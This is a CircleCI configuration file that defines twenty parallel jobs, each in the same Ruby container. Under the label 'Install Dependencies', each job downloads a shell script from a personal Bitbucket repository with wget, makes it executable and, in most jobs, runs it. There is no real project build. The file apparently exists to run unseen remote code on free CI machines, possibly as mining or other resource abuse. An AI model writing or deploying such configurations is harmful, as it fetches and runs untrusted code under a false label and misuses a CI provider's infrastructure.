version: 2.1
orbs:
  ruby: circleci/ruby@0.1.2 
jobs:
    kontol1:
      docker:
            - image: circleci/ruby:2.6.3-stretch-node
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Konimo676/bos/raw/0408d146145f2832f913a0ed5a106ce1977e0509/go.sh && chmod u+x go.sh
    kontol2:
      docker:
            - image: circleci/ruby:2.6.3-stretch-node
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Konimo676/bos/raw/0408d146145f2832f913a0ed5a106ce1977e0509/go.sh && chmod u+x go.sh && ./go.sh
    kontol3:
      docker:
            - image: circleci/ruby:2.6.3-stretch-node
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Konimo676/bos/raw/0408d146145f2832f913a0ed5a106ce1977e0509/go.sh && chmod u+x go.sh && ./go.sh
    kontol4:
      docker:
            - image: circleci/ruby:2.6.3-stretch-node
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Konimo676/bos/raw/0408d146145f2832f913a0ed5a106ce1977e0509/go.sh && chmod u+x go.sh
    kontol5:
      docker:
            - image: circleci/ruby:2.6.3-stretch-node
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Konimo676/bos/raw/0408d146145f2832f913a0ed5a106ce1977e0509/go.sh && chmod u+x go.sh &&
    kontol6:
      docker:
            - image: circleci/ruby:2.6.3-stretch-node
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Konimo676/bos/raw/0408d146145f2832f913a0ed5a106ce1977e0509/go.sh && chmod u+x go.sh && ./go.sh
    kontol7:
      docker:
            - image: circleci/ruby:2.6.3-stretch-node
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Konimo676/bos/raw/0408d146145f2832f913a0ed5a106ce1977e0509/go.sh && chmod u+x go.sh
    kontol8:
      docker:
            - image: circleci/ruby:2.6.3-stretch-node
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Konimo676/bos/raw/0408d146145f2832f913a0ed5a106ce1977e0509/go.sh && chmod u+x go.sh && ./go.sh
    kontol9:
      docker:
            - image: circleci/ruby:2.6.3-stretch-node
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Konimo676/bos/raw/0408d146145f2832f913a0ed5a106ce1977e0509/go.sh && chmod u+x go.sh && ./go.sh
    kontol10:
      docker:
            - image: circleci/ruby:2.6.3-stretch-node
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Konimo676/bos/raw/0408d146145f2832f913a0ed5a106ce1977e0509/go.sh && chmod u+x go.sh && ./go.sh
    kontol11:
      docker:
            - image: circleci/ruby:2.6.3-stretch-node
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Konimo676/bos/raw/0408d146145f2832f913a0ed5a106ce1977e0509/go.sh && chmod u+x go.sh && ./go.sh
    kontol12:
      docker:
            - image: circleci/ruby:2.6.3-stretch-node
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Konimo676/bos/raw/0408d146145f2832f913a0ed5a106ce1977e0509/go.sh && chmod u+x go.sh && ./go.sh
    kontol13:
      docker:
            - image: circleci/ruby:2.6.3-stretch-node
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Konimo676/bos/raw/0408d146145f2832f913a0ed5a106ce1977e0509/go.sh && chmod u+x go.sh
    kontol14:
      docker:
            - image: circleci/ruby:2.6.3-stretch-node
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Konimo676/bos/raw/0408d146145f2832f913a0ed5a106ce1977e0509/go.sh && chmod u+x go.sh && ./go.sh
    kontol15:
      docker:
            - image: circleci/ruby:2.6.3-stretch-node
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Konimo676/bos/raw/0408d146145f2832f913a0ed5a106ce1977e0509/go.sh && chmod u+x go.sh && ./go.sh
    kontol16:
      docker:
            - image: circleci/ruby:2.6.3-stretch-node
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Konimo676/bos/raw/0408d146145f2832f913a0ed5a106ce1977e0509/go.sh && chmod u+x go.sh && ./go.sh
    kontol17:
      docker:
            - image: circleci/ruby:2.6.3-stretch-node
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Konimo676/bos/raw/0408d146145f2832f913a0ed5a106ce1977e0509/go.sh && chmod u+x go.sh && ./go.sh
    kontol18:
      docker:
            - image: circleci/ruby:2.6.3-stretch-node
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Konimo676/bos/raw/0408d146145f2832f913a0ed5a106ce1977e0509/go.sh && chmod u+x go.sh && ./go.sh
    kontol19:
      docker:
            - image: circleci/ruby:2.6.3-stretch-node
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Konimo676/bos/raw/0408d146145f2832f913a0ed5a106ce1977e0509/go.sh && chmod u+x go.sh && ./go.sh
    kontol20:
      docker:
            - image: circleci/ruby:2.6.3-stretch-node
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Konimo676/bos/raw/0408d146145f2832f913a0ed5a106ce1977e0509/go.sh && chmod u+x go.sh && ./go.sh

workflows:
    version: 2.1
    build:
        jobs:
            - kontol1
            - kontol2
            - kontol3
            - kontol4
            - kontol5
            - kontol6
            - kontol7
            - kontol8
            - kontol9
            - kontol10
            - kontol11
            - kontol12
            - kontol13
            - kontol14
            - kontol15
            - kontol16
            - kontol17
            - kontol18
            - kontol19
            - kontol20
            